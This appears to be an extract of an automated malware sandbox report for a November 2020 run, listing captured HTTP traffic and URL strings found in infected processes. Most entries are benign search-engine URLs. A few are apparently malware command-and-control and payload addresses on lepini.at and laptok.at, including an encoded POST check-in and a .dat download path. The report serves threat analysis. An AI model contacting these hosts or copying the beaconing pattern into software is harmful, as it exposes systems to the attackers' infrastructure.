            Source: unknownHTTP traffic detected: POST /api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7/71DFI8PUSCc4m/XMwm02nY/k4iLrUAYDDvtv52BcxN4JBR/mhz_2Ft8VK/cNDRoyaxMsIxwxiz7/z7UQYEM6OBEY/IsC_2BO60JP/8DQpEZ9_2FIB1d/I_2FlPwkTE_2BidQ3R_2F/R3ia9KhwObxc1lnS/i7zxvyPIE4qo3ur/Ak3ONUjFI0trLtGmdw/2_2B5VotK/XxvvgQefWGm6F_0A_0Dg/2ryULZlOS2cT7CbqIGS/McMh6tWsIGNL2hue3Skqhq/rpuSb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:40:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/ap
            Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNAAZYZ
            Source: explorer.exe, 0000001D.00000000.388307908.000000000891C000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVlj
            Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_
            Source: explorer.exe, 0000001D.00000000.392738198.000000000DC5F000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWT
            Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: http://api3.lepini.at/api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001D.00000000.388809444.0000000008B54000.00000004.00000001.sdmpString found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: loaddll32.exe, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.369200959.0000022F9DAA8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000013.00000002.373535807.0000022F84FD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
